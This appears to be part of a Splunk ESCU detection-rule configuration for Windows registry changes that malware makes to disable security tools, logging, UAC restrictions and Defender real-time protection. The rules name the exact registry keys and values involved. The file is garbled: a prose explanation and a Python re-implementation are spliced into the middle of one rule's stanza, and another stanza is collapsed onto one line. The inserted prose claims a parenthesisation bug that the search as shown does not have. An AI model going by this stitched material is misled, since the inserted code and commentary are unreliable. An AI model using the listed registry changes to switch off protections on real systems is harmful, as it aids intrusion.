action.notable.param.rule_description = This search identifies a registry modification that disables regedit or the registry tools of the Windows operating system. Since the registry tool is a Swiss army knife for analyzing the registry, malware such as RATs or trojan spyware disables this application to prevent the removal of their registry entries, such as persistence, fileless components and defense evasion settings.
action.notable.param.rule_title = Disable Registry Tool
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_registry_tool_filter`

[ESCU - Disable Schedule Task - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects a suspicious command line that disables an existing scheduled task. This technique is used by adversaries or commodity malware like IcedID to disable security applications (AV products) on the targeted host to evade detection. This TTP is a good pivot to check further why and what other processes ran before and after this detection. Check which process executed the command line and which task was disabled; the parent-child process relationship is quite valuable in this scenario too.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects a suspicious command line that disables an existing scheduled task. This technique is used by adversaries or commodity malware like IcedID to disable security applications (AV products) on the targeted host to evade detection. This TTP is a good pivot to check further why and what other processes ran before and after this detection. Check which process executed the command line and which task was disabled; the parent-child process relationship is quite valuable in this scenario too.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = An admin may disable a problematic scheduled task.
action.escu.creation_date = 2021-10-18
action.escu.modification_date = 2021-10-18
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable Schedule Task - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["IcedID", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = schtasks process with command line $process$ used to disable a scheduled task on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable Schedule Task - Rule
action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects a suspicious command line that disables an existing scheduled task. This technique is used by adversaries or commodity malware like IcedID to disable security applications (AV products) on the targeted host to evade detection. This TTP is a good pivot to check further why and what other processes ran before and after this detection. Check which process executed the command line and which task was disabled; the parent-child process relationship is quite valuable in this scenario too.
action.notable.param.rule_title = Disable Schedule Task
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe Processes.process=*/change* Processes.process=*/disable* by Processes.user Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_schedule_task_filter`

[ESCU - Disable Security Logs Using MiniNt Registry - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects a suspicious registry modification that disables security audit logs. This technique was shared by a researcher: adding this registry key makes Windows believe it is running in WinPE, so it does not log any event to the Security log.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects a suspicious registry modification that disables security audit logs. This technique was shared by a researcher: adding this registry key makes Windows believe it is running in WinPE, so it does not log any event to the Security log.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = Unknown.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable Security Logs Using MiniNt Registry - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = Modified/added/deleted registry entry $registry_path$ in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable Security Logs Using MiniNt Registry - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects a suspicious registry modification that disables security audit logs. This technique was shared by a researcher: adding this registry key makes Windows believe it is running in WinPE, so it does not log any event to the Security log.
action.notable.param.rule_title = Disable Security Logs Using MiniNt Registry
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\Control\\MiniNt\\*") BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_security_logs_using_minint_registry_filter`

[ESCU - Disable Show Hidden Files - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a modification in the Windows registry that prevents users from seeing files with the hidden attribute. This technique is known from some worm and trojan spy malware that drops hidden files on the infected machine.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.001", "T1562.001", "T1564", "T1562", "T1112"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies a modification in the Windows registry that prevents users from seeing files with the hidden attribute. This technique is known from some worm and trojan spy malware that drops hidden files on the infected machine.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = unknown action.escu.creation_date = 2024-02-14 action.escu.modification_date = 2024-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Show Hidden Files - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "Azorult"] action.risk = 1 action.risk.param._risk_message = Disabled 'Show Hidden Files' on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Show Hidden Files - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "Azorult"], "cis20": ["CIS 10"], "confidence": 100, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.001", "T1562.001", "T1564", "T1562", "T1112"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE 
(Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden" OR (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt" Registry.registry_value_data = "0x00000001") OR (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden" Registry.registry_value_data = "0x00000000" )) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_show_hidden_files_filter` [ESCU - Disable UAC Remote Restriction - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious modification of registry to disable UAC remote restriction. This technique was well documented in Microsoft page where attacker may modify this registry value to bypassed UAC feature of windows host. This is a good indicator that some tries to bypassed UAC to suspicious process or gain privilege escalation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious modification of registry to disable UAC remote restriction. This technique was well documented in Microsoft page where attacker may modify this registry value to bypassed UAC feature of windows host. This is a good indicator that some tries to bypassed UAC to suspicious process or gain privilege escalation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. 
If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An administrator may set this policy on non-critical machines.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable UAC Remote Restriction - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious Windows Registry Activities", "Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = Modified/added/deleted registry entry $registry_path$ in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable UAC Remote Restriction - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Windows Registry Activities", "Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic detects a suspicious registry modification that disables UAC remote restrictions by setting LocalAccountTokenFilterPolicy to 1. \
Microsoft documents this value; adversaries set it so that local administrator accounts obtain a full, unfiltered administrator token over the network, bypassing the UAC token filtering that Windows applies to remote logons. This is a good indicator of an attempt to bypass UAC from a suspicious process or to escalate privileges.
action.notable.param.rule_title = Disable UAC Remote Restriction
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\CurrentVersion\\Policies\\System*" Registry.registry_value_name="LocalAccountTokenFilterPolicy" Registry.registry_value_data="0x00000001" ) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_uac_remote_restriction_filter`

[ESCU - Disable Windows App Hotkeys - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects a suspicious registry modification under Image File Execution Options that sets an application's Debugger value to the string "HotKey Disabled". This technique is commonly used to disable native Windows applications, and the shortcut keys that launch them, such as `taskmgr.exe` and `cmd.exe`, in order to impair the analyst's ability to investigate and remove the attacker's implant on a compromised system.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects a suspicious registry modification under Image File Execution Options that sets an application's Debugger value to the string "HotKey Disabled". This technique is commonly used to disable native Windows applications, and the shortcut keys that launch them, such as `taskmgr.exe` and `cmd.exe`, in order to impair the analyst's ability to investigate and remove the attacker's implant on a compromised system.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable Windows App Hotkeys - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["XMRig", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = Disabled 'Windows App Hotkeys' on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable Windows App Hotkeys - Rule
action.correlationsearch.annotations = {"analytic_story": ["XMRig", \
"Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects a suspicious registry modification under Image File Execution Options that sets an application's Debugger value to the string "HotKey Disabled". This technique is commonly used to disable native Windows applications, and the shortcut keys that launch them, such as `taskmgr.exe` and `cmd.exe`, in order to impair the analyst's ability to investigate and remove the attacker's implant on a compromised system.
action.notable.param.rule_title = Disable Windows App Hotkeys
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\Windows NT\\CurrentVersion\\Image File Execution Options\\*" AND Registry.registry_value_data= "HotKey Disabled" AND Registry.registry_value_name = "Debugger") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_app_hotkeys_filter`

[ESCU - Disable Windows Behavior Monitoring - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search identifies registry modifications that disable Windows Defender real-time protection features such as behavior monitoring. This technique is commonly seen in RATs, bots and Trojans, which disable AV to evade detection.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search identifies registry modifications that disable Windows Defender real-time protection features such as behavior monitoring. This technique is commonly seen in RATs, bots and Trojans, which disable AV to evade detection.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An administrator or user may choose to disable these Windows features.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable Windows Behavior Monitoring - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Azorult", "Ransomware", "Windows Registry Abuse", "RedLine Stealer", "Windows Defense Evasion Tactics", "CISA AA23-347A", "Revil Ransomware"]
action.risk = 1
action.risk.param._risk_message = Windows Defender real time behavior monitoring disabled on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable Windows Behavior Monitoring - Rule
action.correlationsearch.annotations \
= {"analytic_story": ["Azorult", "Ransomware", "Windows Registry Abuse", "RedLine Stealer", "Windows Defense Evasion Tactics", "CISA AA23-347A", "Revil Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search identifies registry modifications that disable Windows Defender real-time protection features such as behavior monitoring. This technique is commonly seen in RATs, bots and Trojans, which disable AV to evade detection.
action.notable.param.rule_title = Disable Windows Behavior Monitoring
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring" OR Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection" OR Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableScanOnRealtimeEnable" OR Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring" OR Registry.registry_path= "*\\Real-Time Protection\\DisableIntrusionPreventionSystem" OR Registry.registry_path= "*\\Real-Time Protection\\DisableIOAVProtection" OR Registry.registry_path= "*\\Real-Time Protection\\DisableScriptScanning") AND Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name \
Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_behavior_monitoring_filter`

[ESCU - Disable Windows SmartScreen Protection - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following search identifies a registry modification that disables Windows SmartScreen. SmartScreen is a Windows feature that provides an early warning against websites that may engage in phishing or malware distribution. This modification is seen in RAT malware to cover its tracks when downloading further components or other payloads.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following search identifies a registry modification that disables Windows SmartScreen. SmartScreen is a Windows feature that provides an early warning against websites that may engage in phishing or malware distribution. This modification is seen in RAT malware to cover its tracks when downloading further components or other payloads.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An administrator or user may choose to disable this Windows feature.
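The four registry rules above (Disable Show Hidden Files, Disable UAC Remote Restriction, Disable Windows App Hotkeys, Disable Windows Behavior Monitoring) share one shape: a wildcard match on `registry_path`, optionally a fixed `registry_value_name`, and a comparison on `registry_value_data`. The Python below is an added example, not Splunk or security_content code: it re-implements those WHERE clauses over constructed Sysmon EventID 13 events so the logic can be exercised offline. It assumes the Endpoint.Registry fields arrive normalised the way the rules compare them (a DWORD of 1 as `0x00000001`, key path plus value name in `registry_path`) and that wildcard matching is case-insensitive; the hosts, users and events are made up. It also shows why the Behavior Monitoring search's OR chain must be parenthesised: in SPL, AND binds tighter than OR, so an unparenthesised `p1 OR p2 ... OR p7 AND data=1` only constrains the last path.

```python
"""Added example (not part of security_content): evaluate the registry-based ESCU
rules above over constructed Sysmon EventID 13 (registry value set) events."""
import fnmatch
from dataclasses import dataclass


@dataclass(frozen=True)
class RegistryEvent:
    dest: str
    user: str
    registry_path: str        # key path plus value name, as Endpoint.Registry.registry_path carries it
    registry_value_name: str
    registry_value_data: str  # assumed normalised: a DWORD of 1 arrives as "0x00000001"


# One alternative per tuple: (registry_path glob, required value name or None,
# accepted registry_value_data values or None for "any value"). A rule fires when
# any alternative matches. These mirror the WHERE clauses of the searches above.
RULES = {
    "Disable Show Hidden Files": [
        ("*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden", None, None),
        ("*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt", None, {"0x00000001"}),
        ("*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", None, {"0x00000000"}),
    ],
    "Disable UAC Remote Restriction": [
        ("*\\CurrentVersion\\Policies\\System*", "LocalAccountTokenFilterPolicy", {"0x00000001"}),
    ],
    "Disable Windows App Hotkeys": [
        ("*\\Windows NT\\CurrentVersion\\Image File Execution Options\\*", "Debugger", {"HotKey Disabled"}),
    ],
}

DEFENDER_PATHS = (
    "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring",
    "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection",
    "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableScanOnRealtimeEnable",
    "*\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring",
    "*\\Real-Time Protection\\DisableIntrusionPreventionSystem",
    "*\\Real-Time Protection\\DisableIOAVProtection",
    "*\\Real-Time Protection\\DisableScriptScanning",
)
RULES["Disable Windows Behavior Monitoring"] = [(p, None, {"0x00000001"}) for p in DEFENDER_PATHS]


def _glob(value: str, pattern: str) -> bool:
    """SPL-style wildcard: '*' matches any run of characters; compared case-insensitively (assumption)."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def matching_rules(ev: RegistryEvent) -> list:
    """Names of the rules whose WHERE clause the event satisfies, in definition order."""
    hits = []
    for name, alternatives in RULES.items():
        for path_glob, value_name, accepted in alternatives:
            if not _glob(ev.registry_path, path_glob):
                continue
            if value_name is not None and ev.registry_value_name != value_name:
                continue
            if accepted is not None and ev.registry_value_data not in accepted:
                continue
            hits.append(name)
            break
    return hits


def behavior_monitoring_as_written(ev: RegistryEvent) -> bool:
    """`p1 OR p2 ... OR p7 AND data=1` as SPL parses it: only the last path is tied to
    the value check, so the first six paths fire on any value, including a re-enable (0)."""
    *unconstrained, last = DEFENDER_PATHS
    return any(_glob(ev.registry_path, p) for p in unconstrained) or (
        _glob(ev.registry_path, last) and ev.registry_value_data == "0x00000001"
    )


def behavior_monitoring_fixed(ev: RegistryEvent) -> bool:
    """`(p1 OR ... OR p7) AND data=1`: every path must carry the disabling value."""
    return any(_glob(ev.registry_path, p) for p in DEFENDER_PATHS) and ev.registry_value_data == "0x00000001"


def notables(events) -> list:
    """Rows a `... BY dest user` grouping would surface: one (host, user, rule) per match."""
    rows = set()
    for ev in events:
        for rule in matching_rules(ev):
            rows.add((ev.dest, ev.user, rule))
    return sorted(rows)


# Constructed sample events (hosts, users and paths are made up for illustration).
SAMPLE_EVENTS = [
    RegistryEvent("WS01", "CORP\\alice", "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", "LocalAccountTokenFilterPolicy", "0x00000001"),
    RegistryEvent("WS01", "CORP\\alice", "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\\Debugger", "Debugger", "HotKey Disabled"),
    RegistryEvent("WS02", "CORP\\bob", "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring", "DisableBehaviorMonitoring", "0x00000001"),
    RegistryEvent("WS02", "CORP\\bob", "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring", "DisableBehaviorMonitoring", "0x00000000"),  # re-enabling: benign
    RegistryEvent("WS03", "CORP\\carol", "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt", "HideFileExt", "0x00000000"),  # showing extensions: benign
]

if __name__ == "__main__":
    for row in notables(SAMPLE_EVENTS):
        print(row)
    print("as written fires on re-enable:", behavior_monitoring_as_written(SAMPLE_EVENTS[3]))
    print("fixed fires on re-enable:", behavior_monitoring_fixed(SAMPLE_EVENTS[3]))
```

Run it as a script to see the three notable rows and the two answers for the re-enable event; the `_glob` helper is the only place the SPL matching semantics live, so it is where to adjust if your data model keeps `registry_value_data` in Sysmon's raw `DWORD (0x00000001)` form.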
action.escu.creation_date = 2024-02-14
action.escu.modification_date = 2024-02-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable Windows SmartScreen Protection - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = The Windows Smartscreen was disabled on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable Windows SmartScreen Protection - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
